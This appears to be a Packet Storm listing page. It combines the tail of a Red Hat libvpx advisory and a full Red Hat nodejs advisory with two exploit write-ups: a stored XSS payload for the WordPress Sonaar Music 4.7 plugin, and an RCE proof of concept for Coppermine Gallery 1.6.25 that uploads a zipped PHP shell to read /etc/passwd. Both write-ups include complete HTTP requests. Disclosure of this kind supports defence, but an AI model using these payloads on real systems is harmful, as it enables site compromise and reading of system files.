libvpx-utils-debuginfo-1.7.0-10.el8_4.x86_64.rpm

Red Hat Enterprise Linux AppStream E4S (v.8.4):

Source:  
libvpx-1.7.0-10.el8_4.src.rpm

aarch64:  
libvpx-1.7.0-10.el8_4.aarch64.rpm  
libvpx-debuginfo-1.7.0-10.el8_4.aarch64.rpm  
libvpx-debugsource-1.7.0-10.el8_4.aarch64.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_4.aarch64.rpm

ppc64le:  
libvpx-1.7.0-10.el8_4.ppc64le.rpm  
libvpx-debuginfo-1.7.0-10.el8_4.ppc64le.rpm  
libvpx-debugsource-1.7.0-10.el8_4.ppc64le.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_4.ppc64le.rpm

s390x:  
libvpx-1.7.0-10.el8_4.s390x.rpm  
libvpx-debuginfo-1.7.0-10.el8_4.s390x.rpm  
libvpx-debugsource-1.7.0-10.el8_4.s390x.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_4.s390x.rpm

x86_64:  
libvpx-1.7.0-10.el8_4.i686.rpm  
libvpx-1.7.0-10.el8_4.x86_64.rpm  
libvpx-debuginfo-1.7.0-10.el8_4.i686.rpm  
libvpx-debuginfo-1.7.0-10.el8_4.x86_64.rpm  
libvpx-debugsource-1.7.0-10.el8_4.i686.rpm  
libvpx-debugsource-1.7.0-10.el8_4.x86_64.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_4.i686.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_4.x86_64.rpm

Red Hat Enterprise Linux AppStream TUS (v.8.4):

Source:  
libvpx-1.7.0-10.el8_4.src.rpm

aarch64:  
libvpx-1.7.0-10.el8_4.aarch64.rpm  
libvpx-debuginfo-1.7.0-10.el8_4.aarch64.rpm  
libvpx-debugsource-1.7.0-10.el8_4.aarch64.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_4.aarch64.rpm

ppc64le:  
libvpx-1.7.0-10.el8_4.ppc64le.rpm  
libvpx-debuginfo-1.7.0-10.el8_4.ppc64le.rpm  
libvpx-debugsource-1.7.0-10.el8_4.ppc64le.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_4.ppc64le.rpm

s390x:  
libvpx-1.7.0-10.el8_4.s390x.rpm  
libvpx-debuginfo-1.7.0-10.el8_4.s390x.rpm  
libvpx-debugsource-1.7.0-10.el8_4.s390x.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_4.s390x.rpm

x86_64:  
libvpx-1.7.0-10.el8_4.i686.rpm  
libvpx-1.7.0-10.el8_4.x86_64.rpm  
libvpx-debuginfo-1.7.0-10.el8_4.i686.rpm  
libvpx-debuginfo-1.7.0-10.el8_4.x86_64.rpm  
libvpx-debugsource-1.7.0-10.el8_4.i686.rpm  
libvpx-debugsource-1.7.0-10.el8_4.x86_64.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_4.i686.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-5217  
https://access.redhat.com/security/cve/CVE-2023-44488  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJlJBvKAAoJENzjgjWX9erEXUMP/AoW1WR8q3KXx4CskGTzcUf/  
EBU4kytn7iE71pSm9vrdDzkiOMLR0zRScZMZwtHiuxK6d+W7EdWZLUDKtFWmKcVS  
dIgyT8/TgpkDcv5EPWU5OOlpmrl06YgPzaH3FKkr2J9n4HFBIgZZaDS9MTRbjP6k  
jR94R1vwvh17mviTeEbnGcY7VaI4iQpSj7uWYLc4PvRP9h/BYzCWcDBlDBTNb5zn  
wy/skEKKHUuf9x00vCqxPB6LGh7sLqfAsnpWWRQFA3C/KSHbfOcorLvA5E7OqlIG  
urz+0S84i2nzN9ZB9hViAX7CoivdWu0yEIN79eZc9XzWkhu4YIJul4BlfXA7YrUx  
4y73buktDWxpPeqx18KQl1q8ELTTmEkhsIRYSfJgZrbdFt8cs9t9ksmTDbmc5EMV  
AW73vbb0fg0zc1Hv+R6N0b4MMuWxOraQvFJ6tBvoxtBT8d4TGUUIduzGdnBkSetj  
zdMgG0PZNMkaGznZgbjOaJYRvsNhZ3a3imYpL75l+S23Z7D0PLfAvsgXc7ERmSJ5  
OHpP5yaIdcQwfHm0t9p2vlN72cmt7zGvLAeWob3/81SwgTRRgFb7W79AypkrqvHX  
GQ4ltQ7vDNWB2nzzk60FM2Vuz2LtxjOzMQS5TZcgC2Aiki/egHiAV5vLGqwRCFAQ  
9NF4jIFT5KF3vPcR9tqQ  
=zMtC  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-5536-01

WordPress Sonaar Music plugin version 4.7 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Wordpress Sonaar Music Plugin 4.7 - Stored XSS# Date: 2023-09-05# Exploit Author: Furkan Karaarslan# Category : Webapps# Vendor Homepage: http://127.0.0.1/wp/wordpress/wp-comments-post.php# Version: 4.7 (REQUIRED)# Tested on: Windows/Linux----------------------------------------------------------------------------------------------------1-First install sonar music plugin.2-Then come to the playlist add page. > http://127.0.0.1/wp/wordpress/wp-admin/edit.php?post_type=sr_playlist3-Press the Add new playlist button4-Put a random title on the page that opens and publish the page. > http://127.0.0.1/wp/wordpress/wp-admin/post-new.php?post_type=sr_playlist5-This is the published page http://127.0.0.1/wp/wordpress/album_slug/test/6-Let's paste our xss payload in the comment section. Payload: <script>alert("XSS")</script>BingooRequest:POST /wp/wordpress/wp-comments-post.php HTTP/1.1Host: 127.0.0.1Content-Length: 155Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://127.0.0.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://127.0.0.1/wp/wordpress/album_slug/test/Accept-Encoding: gzip, deflateAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7Cookie: comment_author_email_52c14530c1f3bbfa6d982f304802224a=a%40gmail.com; comment_author_52c14530c1f3bbfa6d982f304802224a=a%22%26gt%3Balert%28%29; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_52c14530c1f3bbfa6d982f304802224a=hunter%7C1694109284%7CXGnjFgcc7FpgQkJrAwUv1kG8XaQu3RixUDyZJoRSB1W%7C16e2e3964e42d9e56edd7ab7e45b676094d0b9e0ab7fcec2e84549772e438ba9; wp-settings-time-1=1693936486Connection: closecomment=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&submit=Yorum+g%C3%B6nder&comment_post_ID=13&comment_parent=0&_wp_unfiltered_html_comment=95f4bd9cf5

WordPress Sonaar Music 4.7 Cross Site Scripting

Red Hat Security Advisory 2023-5533-01 - Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. The package has been upgraded to a later upstream version: nodejs. Issues addressed include HTTP request smuggling, buffer overflow, bypass, crlf injection, and denial of service vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: nodejs security, bug fix, and enhancement update  
Advisory ID:       RHSA-2023:5533-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:5533  
Issue date:        2023-10-09  
CVE Names:         CVE-2022-4904 CVE-2022-25881 CVE-2023-23920   
                   CVE-2023-23936 CVE-2023-24807 CVE-2023-30581   
                   CVE-2023-30588 CVE-2023-30589 CVE-2023-30590   
                   CVE-2023-32002 CVE-2023-32006 CVE-2023-32559   
=====================================================================

1. Summary:

An update for nodejs is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Node.js is a software development platform for building fast and scalable  
network applications in the JavaScript programming language.

The package has been upgraded to a later upstream version: nodejs  
(16.20.2).

Security Fix(es):

* nodejs: Permissions policies can be bypassed via Module._load  
(CVE-2023-32002)

* c-ares: buffer overflow in config_sortlist() due to missing string length  
check (CVE-2022-4904)

* http-cache-semantics: Regular Expression Denial of Service (ReDoS)  
vulnerability (CVE-2022-25881)

* Node.js: Fetch API did not protect against CRLF injection in host headers  
(CVE-2023-23936)

* nodejs: mainModule.proto bypass experimental policy mechanism  
(CVE-2023-30581)

* nodejs: process interuption due to invalid Public Key information in x509  
certificates (CVE-2023-30588)

* nodejs: HTTP Request Smuggling via Empty headers separated by CR  
(CVE-2023-30589)

* nodejs: DiffieHellman do not generate keys after setting a private key  
(CVE-2023-30590)

* nodejs: Permissions policies can impersonate other modules in using  
module.constructor.createRequire() (CVE-2023-32006)

* nodejs: Permissions policies can be bypassed via process.binding  
(CVE-2023-32559)

* Node.js: insecure loading of ICU data through ICU_DATA environment  
variable (CVE-2023-23920)

* Node.js: Regular Expression Denial of Service in Headers fetch API  
(CVE-2023-24807)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* nodejs: Rebase to the latest Nodejs 16 release [rhel-9] (BZ#2236435,  
BZ#2178078, BZ#2223335)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2165824 - CVE-2022-25881 http-cache-semantics: Regular Expression Denial of Service (ReDoS) vulnerability  
2168631 - CVE-2022-4904 c-ares: buffer overflow in config_sortlist() due to missing string length check  
2172190 - CVE-2023-23936 Node.js: Fetch API did not protect against CRLF injection in host headers  
2172204 - CVE-2023-24807 Node.js: Regular Expression Denial of Service in Headers fetch API  
2172217 - CVE-2023-23920 Node.js: insecure loading of ICU data through ICU_DATA environment variable  
2178078 - nodejs: Rebase to the latest Nodejs 16 release [rhel-9] [rhel-9.0.0.z]  
2219824 - CVE-2023-30581 nodejs: mainModule.proto bypass experimental policy mechanism  
2219838 - CVE-2023-30588 nodejs: process interuption due to invalid Public Key information in x509 certificates  
2219841 - CVE-2023-30589 nodejs: HTTP Request Smuggling via Empty headers separated by CR  
2219842 - CVE-2023-30590 nodejs: DiffieHellman do not generate keys after setting a private key  
2223335 - nodejs: Rebase to the latest Nodejs 16 release [rhel-9] [rhel-9.0.0.z]  
2230948 - CVE-2023-32002 nodejs: Permissions policies can be bypassed via Module._load  
2230955 - CVE-2023-32006 nodejs: Permissions policies can impersonate other modules in using module.constructor.createRequire()  
2230956 - CVE-2023-32559 nodejs: Permissions policies can be bypassed via process.binding  
2236435 - nodejs: Rebase to the latest Nodejs 16 release [rhel-9] [rhel-9.0.0.z]

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

Source:  
nodejs-16.20.2-1.el9_0.src.rpm

aarch64:  
nodejs-16.20.2-1.el9_0.aarch64.rpm  
nodejs-debuginfo-16.20.2-1.el9_0.aarch64.rpm  
nodejs-debugsource-16.20.2-1.el9_0.aarch64.rpm  
nodejs-full-i18n-16.20.2-1.el9_0.aarch64.rpm  
nodejs-libs-16.20.2-1.el9_0.aarch64.rpm  
nodejs-libs-debuginfo-16.20.2-1.el9_0.aarch64.rpm  
npm-8.19.4-1.16.20.2.1.el9_0.aarch64.rpm

noarch:  
nodejs-docs-16.20.2-1.el9_0.noarch.rpm

ppc64le:  
nodejs-16.20.2-1.el9_0.ppc64le.rpm  
nodejs-debuginfo-16.20.2-1.el9_0.ppc64le.rpm  
nodejs-debugsource-16.20.2-1.el9_0.ppc64le.rpm  
nodejs-full-i18n-16.20.2-1.el9_0.ppc64le.rpm  
nodejs-libs-16.20.2-1.el9_0.ppc64le.rpm  
nodejs-libs-debuginfo-16.20.2-1.el9_0.ppc64le.rpm  
npm-8.19.4-1.16.20.2.1.el9_0.ppc64le.rpm

s390x:  
nodejs-16.20.2-1.el9_0.s390x.rpm  
nodejs-debuginfo-16.20.2-1.el9_0.s390x.rpm  
nodejs-debugsource-16.20.2-1.el9_0.s390x.rpm  
nodejs-full-i18n-16.20.2-1.el9_0.s390x.rpm  
nodejs-libs-16.20.2-1.el9_0.s390x.rpm  
nodejs-libs-debuginfo-16.20.2-1.el9_0.s390x.rpm  
npm-8.19.4-1.16.20.2.1.el9_0.s390x.rpm

x86_64:  
nodejs-16.20.2-1.el9_0.x86_64.rpm  
nodejs-debuginfo-16.20.2-1.el9_0.i686.rpm  
nodejs-debuginfo-16.20.2-1.el9_0.x86_64.rpm  
nodejs-debugsource-16.20.2-1.el9_0.i686.rpm  
nodejs-debugsource-16.20.2-1.el9_0.x86_64.rpm  
nodejs-full-i18n-16.20.2-1.el9_0.x86_64.rpm  
nodejs-libs-16.20.2-1.el9_0.i686.rpm  
nodejs-libs-16.20.2-1.el9_0.x86_64.rpm  
nodejs-libs-debuginfo-16.20.2-1.el9_0.i686.rpm  
nodejs-libs-debuginfo-16.20.2-1.el9_0.x86_64.rpm  
npm-8.19.4-1.16.20.2.1.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-4904  
https://access.redhat.com/security/cve/CVE-2022-25881  
https://access.redhat.com/security/cve/CVE-2023-23920  
https://access.redhat.com/security/cve/CVE-2023-23936  
https://access.redhat.com/security/cve/CVE-2023-24807  
https://access.redhat.com/security/cve/CVE-2023-30581  
https://access.redhat.com/security/cve/CVE-2023-30588  
https://access.redhat.com/security/cve/CVE-2023-30589  
https://access.redhat.com/security/cve/CVE-2023-30590  
https://access.redhat.com/security/cve/CVE-2023-32002  
https://access.redhat.com/security/cve/CVE-2023-32006  
https://access.redhat.com/security/cve/CVE-2023-32559  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJlJBvKAAoJENzjgjWX9erEaZkP/3RkSS6TB+iV2kfP0PG4x594  
rLzFxFsAe7yMsm2sEa4KeG10tRkuQ2hUG5VoAsypMYO7pkoQGwd5jzoWHHDP4L3m  
j7G/Mfv/1sF6a5ga2zodLc7eWrzPrgDn0ma7KDDBq04Q5BZBaLNreJ5P0DF+LQtN  
utnqiqvvtH0YwR2aYskn0huk4n85WBtnjDpRIN4EBM8J6zhswxvBG0JFjEIwvNQx  
vNzvVwZvpCQxyvEko5rjc3RbtpXZkJCWsN26tZ8AeYDl4Fa0x9g+GtM1cKVsprTM  
fMubzaTqxd0FvySIIVE6Miy9drCzcWPAmFnGfWOaaxhUbJesaHM3xCgocaIocFGS  
h7e6NxaVf7xAesB2iRCGW/F6z/EghGJDWoTBcfVG9qsutJ0UBrzT3+A6uTPCuLd/  
NIGbZHFlaxls3hSNufzDkRU4qNj5yjOn2Q/hb2Dc33fc7OGfBWAKVU0P7uGPcRfd  
piG+VaE+C8SHiKIiKxh5S0F4vARqEwxuvXoo4fdowQIqxrxsdYyFzQMdam8HPorr  
++5VziXZp3c3SNivhK5haWigEI4K0vFveU+wXlvgMt2ZvpMR0wW+WYzM1WRrFSIC  
tZ2Lwoxqn4+plgxq0yKaDcCa1VVINNYls+sRQ0Kf0VnspuguM9pn7i9Pfctxg+uY  
Cf7azydGontW3r5G2DZl  
=D1Bm  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-5533-01

Coppermine Gallery version 1.6.25 remote code execution exploit.

    Exploit Title: coppermine-gallery 1.6.25 RCEApplication: coppermine-galleryVersion: v1.6.25  Bugs:  RCETechnology: PHPVendor URL: https://coppermine-gallery.net/Software Link: https://github.com/coppermine-gallery/cpg1.6.x/archive/refs/tags/v1.6.25.zipDate of found: 05.09.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps1.First of All create php file content as <?php echo system('cat /etc/passwd'); ?> and sequeze this file with zip.$ cat >> test.php <?php echo system('cat /etc/passwd'); ?>$ zip test.zip test.php1. Login to account2. Go to http://localhost/cpg1.6.x-1.6.25/pluginmgr.php3. Upload zip file4. Visit to php file   http://localhost/cpg1.6.x-1.6.25/plugins/test.phppoc requestPOST /cpg1.6.x-1.6.25/pluginmgr.php?op=upload HTTP/1.1Host: localhostContent-Length: 630Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryi1AopwPnBYPdzorFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/cpg1.6.x-1.6.25/pluginmgr.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: cpg16x_data=YTo0OntzOjI6IklEIjtzOjMyOiI0MmE1Njk2NzhhOWE3YTU3ZTI2ZDgwYThlYjZkODQ4ZCI7czoyOiJhbSI7aToxO3M6NDoibGFuZyI7czo3OiJlbmdsaXNoIjtzOjM6ImxpdiI7YTowOnt9fQ%3D%3D; cpg16x_fav=YToxOntpOjA7aToxO30%3D; d4e0836e1827aa38008bc6feddf97eb4=93ffa260bd94973848c10e15e50b342cConnection: close------WebKitFormBoundaryi1AopwPnBYPdzorFContent-Disposition: form-data; name="plugin"; filename="test.zip"Content-Type: application/zipPK�����™b%Wz½µ}(���(�����test.phpUT  �ñòödÓòödux���������<?php echo system('cat /etc/passwd');?>PK�����™b%Wz½µ}(���(������������¤����test.phpUT�ñòödux���������PK������N���j�����------WebKitFormBoundaryi1AopwPnBYPdzorFContent-Disposition: form-data; name="form_token"50982f2e64a7bfa63dbd912a7fdb4e1e------WebKitFormBoundaryi1AopwPnBYPdzorFContent-Disposition: form-data; name="timestamp"1693905214------WebKitFormBoundaryi1AopwPnBYPdzorF--

Source

Packet Storm